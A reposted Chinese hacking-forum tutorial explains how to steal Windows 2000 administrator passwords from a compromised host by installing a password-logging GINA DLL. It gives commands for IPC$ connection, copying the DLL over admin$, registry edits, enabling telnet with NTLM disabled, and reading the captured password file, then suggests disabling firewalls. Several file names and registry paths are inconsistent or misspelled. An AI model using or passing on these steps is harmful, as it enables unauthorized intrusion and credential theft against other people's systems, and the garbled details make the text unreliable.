[转载]远程3389或SHELL下获得所有管理员密码

文章作者:无⑤聊〓冰㈦

其实原理很简单

当管理员在本地登陆到windows 2000时需要通过系统后台的GINA,WINLOGON.EXE,DLL,SAM文件等一些严整管理员密码的东西，一旦通过才能登陆，我们可以在这里+点东西

换掉默认的gina加入一个能记录密码的DLL文件就可以了

这个文件已经有人写出来了，名字叫NTSHELLGINA。DLL

首先介绍在shell下如何替换（我说详细点你别怪我罗嗦哦，为菜鸟着想嘛：））

打开cmd与肉鸡进行ipc$连接

输入命令net user \\*.*.*.*\ipc$ "****" /user:****回车显示成功

把NTSHELLGINA。DLL拷贝到肉鸡的目录下吧，现在要用COPY命令了啦

输入
copy ntshellgina.dll \\*.*.*.*\admin$\system32\

然后修改注册表

windosw registry editor version 5.00

[HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\windiws nt\currentversion\winlogon]
"ginadll"="c:\\winnt\\system32\\netshellgina.dll"（累死我了）

保存问netshell.reg文件

然后远程拷贝到肉鸡的目录下

使用opentelnet工具在肉鸡上打开telnet服务

opentelnet.exe的使用命令格式如下

opentelnet.exe \\目标主机IP 管理员帐号 密码 NTML认证方式 指定的telnet端口（任意）

NTML认证方式为
0，开启telnet时去掉NTML的身份验证（推荐哦）
1，先进行NTML身份验证如果失败则使用用户名和密码telnet
2，打开NTML身份验证

需要输入的命令就省略了

虽然是连接telnet进入肉鸡但是到如注册表仍然需要别的工具帮忙

使用reg.exe新打开一个CMD窗口然后用COPY命令

copy reg.exe \\*.*.*.*\admin$\system32\

将reg.exe复制到肉鸡的目录下

在telnet命令下输入

reg.exe import netshell.reg

确定后就可以成功的吧netshell.reg导入注册表了

哈哈

等待对方管理员进行登陆吧

他登陆后系统就会把密码保存到system32下的msole.srg文件中

执行查看命令如下（菜鸟照顾死了啦）

进入system32目录

type msole32.srg

到守侯就看到了

至于获得了administrator的PASSWORD想作什么开启关闭防火墙，开启关闭3389就不用我说了吧,在注册表
里找到对应的启动项目分键，删除它就可以了，不过我觉得你如果开启了对方3389端口也就用不到那么麻
烦了

累死我了啦

如果你说你还是不明白那我只能吐血去

此帖子链接：/bbs/viewthread.php?tid=45333

3389下COPY那个文件更加简单

我只说下注册表的到如方法：

开始-运行-输入regedit后进入注册表

展开
HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下新建一个子键，GinaDll

把它的键值msgina.dll替换成ntshellgina.dll就可以了